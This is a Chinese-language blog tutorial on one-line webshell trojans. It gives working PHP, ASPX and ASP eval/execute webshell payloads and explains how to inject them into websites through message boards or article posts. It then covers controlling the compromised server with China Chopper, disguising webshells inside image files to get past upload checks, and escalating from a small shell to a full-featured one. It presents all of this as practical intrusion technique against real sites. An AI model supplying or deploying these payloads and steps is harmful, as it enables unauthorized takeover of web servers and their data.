天天看點

一句話木馬原理與實戰介紹常用一句話木馬實戰

一句話木馬原理與實戰

  • 介紹
  • 常用一句話木馬
    • 分析一句話木馬
    • 一句話使用方法
  • 實戰

介紹

一句話木馬短小精悍,而且功能強大,隐蔽性非常好,在入侵中始終有強大的作用。

常用一句話木馬

php一句話木馬:

   <?php @eval($_POST[value]);?>

  

aspx一句話木馬:

  <%@ Page Language=“Jscript”%>

  <%eval(Request.Item[“value”])%>

  

asp一句話木馬:

   <%execute(request(“v”))%>

代碼本身沒有任何危害,但通過代碼上傳一些惡意的東西(如下載下傳,翻越,删除,建立)時可能會對網站造成一定危害。

分析一句話木馬

<%execute(request(“v”))%>

execute:是用來執行傳過來的資料。

request:通過用戶端定義了一個request接收的方式,服務端接收用戶端傳過來資料有get,post,request等方式。如果在腳本裡寫get的話,腳本傳送資料隻能用get方式,同理寫成post的話,隻能用post傳輸,但如果寫成request的話,get,post傳過來的資料,我都能接收。

V:如果網站隻支援ASP腳本,就要上傳ASP馬,上傳PHP可能不執行,其中“v”是自定義的變量,但是不能太簡單,簡單的話可能被工具爆破出來。

一句話使用方法

首先,找到資料庫是asp格式的網站,然後,以留言闆,或者發表文章的方式,把一句話添加到asp資料庫,或者加進asp網頁.

記住!我們的目的是把一句話<%execute request(“value”)%>添加到資料庫,無論任何方式!

然後打開用戶端(就是你電腦上面的那個htm檔案),填上加入了一句話的asp檔案,或者是asp網頁,然後進入此網站伺服器。

實戰

經過大量滲透已經在一個網站根目錄上傳了一句話木馬(V.asp),涉及隐私,具體步驟不做示範

一定要讓它執行!!! 如果不能執行,插在哪裡都沒用,接着打開中國菜刀,中國菜刀相當于一句話的用戶端,

有些人會問:為什麼要用它連

很多資料庫你得到使用者名和密碼,他如果沒有開允許外連去連的話,用web位址連接配接不到他,我們隻能向網站上傳木馬腳本,用本機的127.0.0.1去連接配接右擊增加shell,

寫入木馬位址,傳參的變量“V”,點選添加

一句話木馬原理與實戰介紹常用一句話木馬實戰

輕按兩下目标網址就可以進入網址根目錄。。。成功

一句話木馬原理與實戰介紹常用一句話木馬實戰

接着可以試着寫入一個文本,點選儲存

一句話木馬原理與實戰介紹常用一句話木馬實戰

接着在浏覽器看能不能通路,可以看到成功寫入文本。

一句話木馬原理與實戰介紹常用一句話木馬實戰

當然有時候我們要做圖檔馬

為什麼要做圖檔馬?

我們在上傳一句話的時候,直接上傳腳本上傳不上去,很多的話是上傳圖檔,頭像等可以上傳到伺服器,

一句話圖檔馬制作

C32下做一句話

打開C32,把圖檔放裡面,寫入一句話儲存,,退出,就制作成功一個圖檔馬

一句話木馬原理與實戰介紹常用一句話木馬實戰

我順便上傳了一個小馬(x.asp),在浏覽器打開

一句話木馬原理與實戰介紹常用一句話木馬實戰

輸入密碼之後,就可以上傳大馬,儲存名為2.asp,點選save

一句話木馬原理與實戰介紹常用一句話木馬實戰

然後在浏覽器打開某某2.asp。。。成功

一句話木馬原理與實戰介紹常用一句話木馬實戰

繼續閱讀